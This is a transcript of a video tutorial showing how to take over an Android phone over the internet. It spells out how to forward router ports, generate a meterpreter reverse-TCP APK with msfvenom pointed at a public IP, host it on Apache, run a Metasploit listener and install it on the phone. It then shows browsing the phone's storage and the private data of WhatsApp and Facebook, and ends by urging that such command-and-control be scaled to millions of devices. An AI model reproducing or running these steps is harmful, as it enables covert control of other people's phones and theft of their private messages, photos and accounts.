Transcript for:
Mobile Hacking with Malicious APK Files

Hi, and welcome back to another episode of How to Hack. So today we'll discuss about hosting Meterpreter servers or listeners onto the internet, and then hacking into a mobile device using a malicious APK file, and from there you get a reverse connection outside through the firewall, and from there on immediately you'll be able to actually gain complete control and access into the storage, into the applications of the Android device immediately. So without further ado, let's get started on today's tutorial.

So over here you can see on the background I have Kali Linux running, and on the foreground I have my own mobile device running, which is not connected to the internal intranet or the wireless access point in my home network. So what you can see here as I scroll down, you can see that I have mobile data running, so it means that I have my own independent IP address, unique IP address, that is then connected out into the internet. So on the background we are going to focus on Kali Linux and how we can actually be able to host the listener, the attacking listener, as well as the delivery mechanism through Apache web server to actually host and deliver the APK file, and then from there on be able to execute the file into the system, install the application, and then ultimately gain control of the entire mobile device.

So what we're going to do now is we are going to look at ifconfig, and when we hit that we can see the internal IP address of the Kali Linux machine, so here we go, 192.168.1.23. So the next thing we're going to do is we're going to open up Firefox or any of the browsers that you would like to use, so we are going to go into the internet gateway, which is 192.168.1.254. So again, this is the internet service provider, which is a router that is sent to your house, and from there on you'll be able to actually utilize it. So over here we can see that the IP address that I have is 202.166.63.69.

So we're going to move into the firewall configuration, and over here we're going to go into the port forwarding. So what we're going to do first is we can actually host our custom server, which is the Kali Linux machine, and this time I'm going to call it the Meterpreter. So once I have it, I'm going to do 192.168.1.23, and the port number, we're going to put 4444 as well as 4444, so this would actually put in the external port start as well as the internal port start automatically for you.

And the next thing I want to do is I want to be able to host the mechanism of the Apache web server. So with this in mind, we have to find out what is the port that we're using for Apache, so I can enter service followed by apache2 followed by start. So once we hit that, we will start the service on Kali Linux, and of course once you do that you can also look at the status of your Apache web server, and of course we can see that it is running. So from here on we want to check out what is the IP address and what is the port that is being used on the Kali Linux, so we can enter 192.168.1.23. So of course we see that it's not using the default port 80, so it could be 8001, so let's go ahead and enter that. So here we can see that we are hosting our Apache web server on the port 8001. So we're going to go back into the router and we're going to hit 8001 on that, likewise for the ending port. So once we have that, we can go ahead and click save or apply, and once you have it running you can see the port forwarding list at the bottom of your access point.

So once that is done, the first thing you want to do is you want to be able to create the malicious APK file. So use msfvenom dash p for the platform, android meterpreter followed by reverse underscore tcp, and then you got your LHOST is 192.168.1.23 and in the LPORT of 4444 followed by the R, and then you output into slash root, or you can output into your Apache web server, slash var slash www slash html slash. So in this case, this is normally what we do whenever we go through the tutorial, but in this case it's going to be different. So in this case we're going to call it android device.apk, and we're going to go back into the LHOST. So the LHOST is going, it's not going to be 192.168.1, because this is for internal internet network only, so we're going to remove this and we are going to change it to the IP address you saw earlier on your internet gateway. So in this case the internet gateway IP address is 202.166.63.69, so this is your IP address that is facing out into the world. So once we do that, we will create the file, and we are going to deliver this file through Apache web server, which is also hosted onto the internet now with the port forwarding enabled. So over here we are going to go into our android device, over here we can actually look at the LHOST, LPORT, so we're gonna put an equal sign, so that, I missed out the equal sign, so remember to put in the equal sign, and then this would generate the APK file immediately.

So once we're done with that, we got to create a listener, a listener which is hosted onto the internet. So the first thing we're going to do is we're going to enter msfconsole dash q, so this will silently update or silently access into the msfconsole. So once we gain access into Metasploit, we are going to use the multi handler, so this will allow us to run the listener. So we're going to go ahead and use exploit slash multi slash handler. So once you do that, you have to set the different kind of options, so you gotta set the payload, so you gotta set the payload as the one that you saw earlier, android slash meterpreter slash reverse underscore tcp. So once you do that, you can enter show options, so there are a couple of parameters that you have to enter, so there's an LHOST and there is a LPORT. So you set the LHOST as 192.168.1.23, so this is the IP address of your internal machine. So once you do that, you have your LPORT and your LHOST running and you can go ahead and exploit, so this would start the TCP handler or the listener.

And now we're gonna put in the APK, malicious APK file, into the Android device. So over here we are going to open up the Android device and we're gonna go ahead and enter the IP address of 202.166.63.69 followed by the port of 8001 followed by android device.apk. So once you hit that, it will say complete action using download, so we can do that, and this will download the file, and we can open it up, and then it would say that, do you want to install this application, you will have access to your call logs, your pictures, videos, contacts and so on. So a lot of times users actually go ahead and install all these applications. So in one of the subsequent videos we will show how you can embed a malicious APK into an authentic application. So once you're done with that, you can go ahead and click open, and when you click open we see that we actually have the Meterpreter session being opened up, and likewise, if you understand this, everything is running through the internet.

So of course once you're here you can enter sysinfo, you can enter help to see all the commands that you can use and utilize as part of post exploitation, so you can enter something like app underscore run or app underscore install, and you can remove different kind of information. So one very quick way of doing things is that we can actually look at the webcam underscore list, or the webcam chat, or the screenshot and so on. So we can enter sysinfo and this will tell us the information about the Android device, and we can also look at a couple of other things here, it is really critical as part of post exploitation. So we can actually enter pwd to see which directory we are at, and we can cd into group directory, so from here we can see a lot more information. We can enter ls -l and we can see all the folders within the Android device, and of course we can go into cd sdcard, ls -l again, this will show us all the information that are within the storage device. So we can go into facebook browder, we can go to Tencent, WhatsApp and so on, so a lot of other things that we can access into, especially very sensitive data. So for example, if you go into com.facebook.katana and then you enter ls -l, so again you're going to see a lot more information, so we can cd into Facebook temporary, so it's a temporary directory by Facebook, and then you can enter l, so it will say send you some information about the file types and so on. So likewise for all the other third-party applications that you install into the Android device.

So there you see it, how quickly we could actually set up a server and use port forwarding to actually route all those data coming into the internet gateway and into your intranet hacking server, which is a listener running a Meterpreter. So again, from there on very quickly you can run all sorts of post modules command, get the malicious APK file out into the internet, and then using that to actually do the delivery mechanism, and then from there on getting complete access in the mobile device. So it's the same concept, it's the same idea, particularly even on laptops, on anything that's mobile, not just mobile devices, but you can start thinking about tablets, thinking about laptops, thinking about desktops, thinking about wearables that have internet access, and from there on you can do a lot of different capabilities by hosting your own hacking servers onto the internet, or hacking listeners.

And if we think about the future of cyber security, what we recognize is that there are a lot of opportunities for you to also think in terms of building containers which could just be hosting the listener, and having those listeners modules being hosted across different cloud providers across the internet, across the globe, and from there on you can scale their operations very, very quickly across the whole planet, and then be able to manage tens, hundreds of thousands of millions of devices and be able to manage your command and control servers in a highly scalable manner, and from there on you can take control of all these devices and perform different kind of post exploitation.

So thank you so much once again for watching. I hope you like what you've just watched, so feel free to leave a comment below and I'll try my best to answer any of your questions, and of course remember to like and subscribe to the channel so that you can become abreast of the latest cyber security tutorials, and thank you so much for watching once again.